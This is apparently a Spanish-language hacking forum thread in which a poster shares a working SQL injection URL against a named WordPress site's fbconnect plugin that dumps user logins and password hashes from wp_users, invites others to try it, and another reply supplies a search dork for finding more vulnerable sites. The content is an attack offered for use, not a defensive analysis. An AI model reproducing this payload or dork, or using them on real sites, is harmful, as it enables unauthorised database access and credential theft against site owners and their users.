buenas, quiero compartir con ustedes como una inyección por get puede arrojar usuarios de worpress
http://www.yurem.com.mx/blog/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+%20select+1,2,3,4,5,concat%28user_login,0x3a,user_pass%29%20z%E2%80%8B0mbyak,7,8,9,10,11,12+from+wp_users--
arrojará en la propia web el usuario y el hash :) no pude subir el screen del sitio pero pruebenlo :)
Interesante el aporte, gracias por compartir...
Saludos! :)
Lo encontraste tu?
Dork: inurl:"?fbconnect_action=myhome"